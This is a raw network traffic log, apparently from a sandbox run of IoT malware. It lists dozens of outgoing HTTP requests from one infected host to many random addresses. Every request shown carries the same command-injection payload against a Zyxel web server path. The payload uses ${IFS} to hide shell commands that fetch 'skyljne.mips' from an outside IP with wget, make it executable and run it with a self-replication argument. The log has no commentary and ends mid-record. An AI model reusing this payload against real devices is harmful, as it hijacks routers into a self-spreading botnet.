                                        Jan 14, 2024 16:18:44.451386929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4226192.168.2.1333074221.129.23.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451447964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4227192.168.2.1357272170.206.199.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451517105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4228192.168.2.134008877.23.116.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451582909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4229192.168.2.1348884129.163.120.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451633930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4230192.168.2.1339784205.247.64.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451695919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4231192.168.2.1341442180.10.201.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451759100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4232192.168.2.1341476165.218.187.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451823950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4233192.168.2.1339378135.182.185.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451875925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4234192.168.2.1338510110.131.114.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451940060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4235192.168.2.1347270191.254.208.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452001095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4236192.168.2.13366705.171.82.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452063084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4237192.168.2.135067651.80.215.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452111006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4238192.168.2.1350658175.15.38.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452171087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4239192.168.2.13341825.82.224.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452220917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4240192.168.2.1346316163.91.2.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452274084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4241192.168.2.135320081.103.156.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452332020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4242192.168.2.133907643.183.242.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452390909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4243192.168.2.1343936149.240.101.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452465057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4244192.168.2.1335328110.138.89.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452512026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4245192.168.2.134181836.236.90.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452574968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4246192.168.2.1347382177.249.115.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452645063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4247192.168.2.1350720220.57.17.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452697992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4248192.168.2.1358148206.29.156.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452754021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4249192.168.2.136068066.42.159.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452800989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4250192.168.2.133443249.176.121.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452842951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4251192.168.2.1342930218.48.251.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452912092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4252192.168.2.1348272111.87.220.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.452966928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4253192.168.2.1345694126.174.76.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453022957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4254192.168.2.135848691.132.64.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453075886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4255192.168.2.135805640.235.20.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453125954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4256192.168.2.1348116190.76.88.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453154087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4257192.168.2.135628478.194.113.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453226089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4258192.168.2.134631870.4.26.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453263044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4259192.168.2.13587324.102.60.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453330040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4260192.168.2.1356070149.26.38.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453393936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4261192.168.2.1343278170.125.24.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453421116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4262192.168.2.1355806221.57.80.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453480005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4263192.168.2.1345150129.21.187.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453530073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4264192.168.2.1339156137.105.39.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453588009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4265192.168.2.135250649.131.130.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453655005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4266192.168.2.133759084.220.88.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453718901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4267192.168.2.1340214167.181.18.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453778982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4268192.168.2.1356708130.194.110.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453835964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4269192.168.2.136067014.163.202.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453891993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4270192.168.2.1346366163.84.242.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453947067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4271192.168.2.13445665.42.237.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.453984022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4272192.168.2.1351124210.64.155.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454045057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4273192.168.2.1342138156.120.105.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454096079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4274192.168.2.1356044145.238.153.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454165936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4275192.168.2.1356420133.104.18.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454227924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4276192.168.2.1357158117.104.7.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454279900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4277192.168.2.134144418.64.109.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454324961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4278192.168.2.1347680178.48.232.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454399109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4279192.168.2.135624612.22.13.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454453945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4280192.168.2.1338710138.188.179.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454519033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4281192.168.2.134368425.99.100.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454572916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4282192.168.2.1343470209.35.102.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454627991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4283192.168.2.134749880.242.169.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454680920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4284192.168.2.1337368170.121.75.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454720020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4285192.168.2.136086694.80.128.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454770088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4286192.168.2.133837243.186.181.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454827070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4287192.168.2.1345064169.123.77.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.454890966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4288192.168.2.1345898204.179.78.190443
                                        TimestampBytes transferredDirectionData
